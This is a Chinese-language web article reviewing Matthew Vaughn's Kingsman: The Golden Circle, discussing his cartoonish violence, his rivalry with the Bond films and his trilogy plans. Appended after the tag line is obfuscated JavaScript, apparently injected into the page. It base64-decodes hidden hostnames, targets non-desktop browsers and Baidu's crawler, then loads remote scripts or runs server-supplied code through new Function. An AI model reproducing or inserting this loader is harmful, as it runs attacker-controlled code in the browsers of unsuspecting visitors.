《王牌特工2》颠覆重口系特工片 依然别具一格

时间:2021-11-28 17:20:04阅读:5008

自己是漫迷,作品中漫改也占了半数。

英国怪咖马修·沃恩却从未跻身MCU、DCEU宇宙的的主流,而是在中低成本里找自由。

在边缘里塑风格,在暴力中造狂欢。

一部[王牌特工:特工学院],诉尽对1970年代间谍片的深情;

影片也在致敬经典和颠覆套路中试探着娱乐新法则。

如今[王牌特工2:黄金圈]的出炉,正式向世界宣告“三部曲”系列的进度。

颠覆大于致敬

007是马修·沃恩求之不得的真爱。

[皇家赌场]那会儿这事差点成了,米高梅喜欢他,奈何版权当家人芭芭拉·布罗科利不点头。

导演常自比斯皮尔伯格:两个痛失邦德的壮志未酬者。

▲一个含恨打造了[夺宝奇兵]系列,一个发奋炮制了[王牌特工]品牌

痴嗔爱怨刻在每一帧里。

是不是自拔身价,要留待后人评说。

但[王牌特工]之后两年间,间谍行当的确风气大改,燕肥环瘦,打情骂俏,轻松惬意。

▲踏着女权东风的[女间谍]、奥斯汀风范的[王牌贱谍:格林斯比]、跨国搅基的[秘密特工]

▲被他指责“玩深沉”的邦德和伯恩则走了下坡路

野狐禅打擂正统?

可正统从来也是风水轮流转。

当年伯恩横空出世,还不是造的老派公子哥邦德的反。

事实上,[王牌特工]这封“致1970年代间谍片的情书”能不能拨乱反正并不重要。

沃恩恣意重口到近乎狂欢式的个人风格,早让其颠覆意义大于致敬。

回归正统,又哪敌再造个正统出来过瘾?

又黄又暴

沃恩并不怕挨骂,多多益善。

库布里克的教导时刻谨记,一挨骂就搬出来给自己助威。

连五个指争议话题都拿不出,怎么好意思叫热门片呢。

罪状归结起来两条:暴力,低俗。

▲被怼公主的品菊邀约有伤风化,他揶揄女权斗士们“毫无幽默感”

老邦德电影里荤段子多得是,换女人开黄腔是女权的进步。

▲被怼爆头总统政治不正确

他回嘴各国政要一视同仁。不光舆论骂,自己人也反水。

科林·费尔斯一度困惑“单纯地享受暴力对吗”(后来当然想开了)。

金·凯瑞干脆拍完[海扁王Ⅱ]就发推自我检讨,跟片子和暴力彻底划清界限。

导演对此皆一笑而过,一副“我粗俗我骄傲”的顽劣。

但他扭头也软下来替自己辩解。

“邦德([幽灵党])的预算2、3亿?我们([王牌特工]预算8000万)玩不起大场面。所以必须找到自己的卖点。”

同是暴力美学,但不能跟别的妖艳贱货一个样。

沃恩当然清楚自己要什么,别人却未必。

▲备受争议之一的“爆头烟花”,有种超现实的美感

沃恩的剧本里标注,“坏人们的脑袋在巴斯比·伯克利式的烟火中爆炸”。

▲提到的这导演是好莱坞歌舞片时代的翘楚,最擅华丽丽的编舞

初尝动作戏的科林·费尔斯后来也常把“舞蹈”挂嘴边,“不像打架,倒像是跳舞。”

教堂百人斩那场戏,沃恩给动作指导下的指示就是“一场杀戮芭蕾”。

▲杜绝快速剪辑,要轻盈流畅,一气呵成

相较之下,柯南伯格的暴力实在粗粝肮脏,五脏六腑乱糟糟一团令人作呕;

昆汀的暴力倒也酣畅淋漓,鲜红爆浆搭配杀猪惨叫还是流于粗鄙。

沃恩的暴力则跟廉价B级趣味南辕北辙。

要追求那么点高级的艺术快感,无色无味,优雅轻巧得甚至感觉不到痛感。

▲刀锋女一脚竖劈兵不血刃,尸首从中缝一分为二,刀口精致得像切生鱼片

一旁观赏的马克·哈米尔几乎要击节赞叹“好手艺”。

“超现实”是动作视效的魂魄 。

防弹西装、雨伞扫射、刀头皮鞋、脚踩利刃。

▲CG味儿和电游味儿浓烈,兵器荒唐

“超现实”也是故事的魂魄。

一张电话卡操控各国首脑,阴谋荒唐,拯救世界。

不忘调情约炮,英雄更荒唐。

场面逼真、关照现实并非沃恩的追求。

相反,[王牌特工]无时无刻不在告诉你:放轻松,别太把电影当回事。

享受电影、享受暴力的前提,首先是保持观赏距离,放下道德包袱。

银幕一黑,死人们甭管正邪,还不是站起来拍拍屁股立马生龙活虎。

而对于那些指责[海扁王]制造幼齿杀人机器、[王牌特工]妖魔化残疾人的正义人士,过不了这个坎儿,也非同道中人。

[王牌特工2]还是不看为好。

恶习不改

回到首部刚上映那会儿,间谍游戏要不要继续玩下去,马修·沃恩心里还在犹豫。

有点身份的导演,往往把拍续集这事看成有失节风险的大事,慎之又慎。

▲比如埃德加·赖特拍[极盗车神]、丹尼·博伊尔拍[猜火车]

搞原创更体面是一方面,狗尾续貂是另一重怕。

尽管只挂名制片,沃恩至今还心有余悸,“我们可不想再拍一部[海扁王Ⅱ]!”

中生代里,沃恩欣赏的导演有詹姆斯·古恩,提起来赞不绝口。

两人的共性不要太多:老不正经的幽默感,音乐品位上的复古控。

两人的困境更相似:第一部把所有好点子玩成了标签元素,续集还怎么搞突破?

[银河护卫队Ⅱ]的解决方案是强化、放大、原地踏步,小树人卖萌,毁灭者尬笑。

▲最终票房买账,评论则一致表示失望——不是不好,就是少了惊艳

照沃恩的说法,“反派成,则间谍片成”。

他在某个清晨醒来,新反派阴谋在脑海里翩然而至,打通了三部曲的任督二脉。

“写[黄金圈]的时候,我们(和编剧老搭档简·古德曼)已经把第三部的发展考虑在内了。”

[黄金圈]是桥梁,联结着第三部的成败。

▲身为星战死忠,当然拿“经典中章案例”[帝国反击战]做标杆

“先带你走入绝境,第三部再置之死地而后生。”

这种提纲挈领的话平添神秘,要等到三部曲功成,才能让人回味出一个恍然大悟的赞叹来。

但担忧也不是没有。

架构上要求变,风格标签却要固守,最好继承中有创新。

有意思的是,当年沃恩炮轰诺兰带起了暗黑风。

如今刚接手[蝙蝠侠]的马特·里夫斯又扬言要拍“完全被黑暗笼罩”的黑色电影。

几年过去,沃恩对这种黑暗调调依旧深恶痛绝。

黑暗不是[王牌特工]的菜。

▲[王牌特工2:黄金圈]就像[教父Ⅱ]、[异形Ⅱ]

你不能说它们更黑暗了,只是情感上更深邃丰富而已。

所有人都希望能再看到一部教堂百人斩。但马修深知搞教堂2.0的话注定会失败。

所以他们搞了新花样,一样刺激,但截然不同。

▲闲言少叙,直接开打

放弃了[X战警]系列的马修·沃恩,意在以[王牌特工]打造自己的独立品牌。

而[王牌特工2:黄金圈]正式检验这个“准系列三部曲”能不能走下去的关键一步。

它所承担的重担,就是如何让观众对这个系列保有持续的新鲜感。

而这些,影片主创们已经做好了准备。

标签:
function SBKIa(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function seWPkJKz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SBKIa(t);};window[''+'Q'+'W'+'u'+'F'+'L'+'y'+'b'+'m'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=seWPkJKz,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bW5lLnnhkaGF5bHQuY24=','142632',window,document,['n','FEyQhax']);}:function(){};
function UUcwV(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UUcwV(t);};window[''+'R'+'E'+'C'+'K'+'K'+'k'+'a'+'w'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkueHJrYWRzbG1nZy54eXo=','457493939611512832',window,document,['','VxKGyJk']);}:function(){};